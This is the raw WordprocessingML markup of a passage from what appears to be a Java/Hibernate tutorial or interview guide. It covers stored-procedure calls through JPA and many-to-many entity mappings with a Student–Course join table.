    <w:p w14:paraId="1E5F537F"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toredProcedure.registerStoredProcedureParameter(2, String.class, ParameterMode.IN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A12E54F"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toredProcedure.setParameter(1, "param1_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F3EE0D"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toredProcedure.setParameter(2, "param2_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16004736" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B897F8"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toredProcedure.execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAAC527" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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lastRenderedPageBreak/>
        <w:t>In this case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A74FC" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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my_procedure is the stored procedure name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646BF49" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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registerStoredProcedureParameter() is used to define the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43254842" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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You set values for the parameters and execute the stored procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851E5AB" w14:textId="77777777" w:rsidR="006A0978"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C06E1D7">
          <v:rect id="_x0000_i2440" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E494DB" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F7732" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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Hibernate Native SQL (createSQLQuery)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For calling stored procedures using native SQL syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC6047" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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Query Annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for native queries in Spring Data JPA to execute stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C065698" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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JPA StoredProcedureQuery</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A JPA interface for calling stored procedures in a more structured way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C649D95" w14:textId="4DABFBAE" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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E26482E">
          <v:rect id="_x0000_i2441" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F957699" w14:textId="1D63346D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002A154B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="552" w:name="_Toc196308032"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Many to many </w:t>
      </w:r>
      <w:r w:rsidR="00AC5794" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>associations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
    </w:p>
    <w:p w14:paraId="0F51D634" w14:textId="414B5851" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Many-to-Many Associations in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51933EEA"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In Hibernate, a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship exists when </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple entities</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of one type are associated with </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple entities</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of another type. This type of relationship is typically represented by a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join table</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the database, which maps the two entities together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E16F6D" w14:textId="77777777" w:rsidR="007570DA"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98F8781">
          <v:rect id="_x0000_i2442" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C68F7" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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How Many-to-Many Relationships Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED38055"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onsider two entities, Student and Course, where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF03FC" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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A </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Student</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can enroll in many </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Courses</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678C2DA" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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A </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Course</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can have many </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Students</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7D2AD"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The relationship between these two entities is </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA1A81" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Join Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119790AC" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1989"/>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Hibernate requires a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join table</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or bridge table) to map this relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E95C6BC" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1989"/>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he join table stores the foreign keys referencing both Student and Course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F61999" w14:textId="77777777" w:rsidR="007570DA"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24E39DB">
          <v:rect id="_x0000_i2443" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640F3CC" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Mapping Many-to-Many Relationship in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5C48E"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Here’s how you would define a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many-to-many</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2678E" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Student Entity (One side of the relationship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABA8FA"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E3200"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ublic class Student {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350DFCD"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A67EFB"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E625647"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94AC46"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA1C20A" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579DAD7B"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ManyToMany</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57153C32"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JoinTable(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3354F"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name = "student_course",  // Join table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A110E29"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joinColumns = @JoinColumn(name = "student_id"),  // Column for Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B591B68"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inverseJoinColumns = @JoinColumn(name = "course_id")  // Column for Course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D1675"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD370C0"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Set&lt;Course&gt; courses = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33996578" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED67FD7"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F32D61"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20A6A5" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Course Entity (Other side of the relationship):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A601EC"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4AFD9"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ublic class Course {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFAEE00"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78894B7D"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GeneratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46220447"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AFA07"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String courseName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26970B" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557D32D3"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ManyToMany(mappedBy = "courses")  // mappedBy refers to the field in the "Student" class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F139A79"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Set&lt;Student&gt; students = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E19FB48" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C9E580"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D765283"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4864E7" w14:textId="77777777" w:rsidR="007570DA"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E0E3FCE">
          <v:rect id="_x0000_i2444" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3753A851" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D0052" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1990"/>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ManyToMany</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the many-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B21BE9" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1990"/>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JoinTable</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the join table that contains two foreign keys: one for the Student and one for the Course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5967B" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1990"/>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mappedBy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the Course entity, the mappedBy attribute ensures that the relationship is maintained in only one of the entities (here, the Student entity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAC88C" w14:textId="77777777" w:rsidR="007570DA"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3B292FB">
          <v:rect id="_x0000_i2445" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C70DD" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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Database Schema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33028522"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hen Hibernate creates the schema, it will generate a join table student_course to manage the relationshi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2"/>
        <w:gridCol w:w="962"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="76BD3588" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BA41B2" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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student_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E77030F" w14:textId="77777777" w:rsidR="007570DA" w:rsidRPr="007F3379" w:rsidRDefault="007570DA"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course_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5FE8C78B" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53BBA681"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60EF85B1"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="0AEA7DEF" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003BFD16"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1868E373"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2BA7D380" w14:textId="77777777" w:rsidTr="007570DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
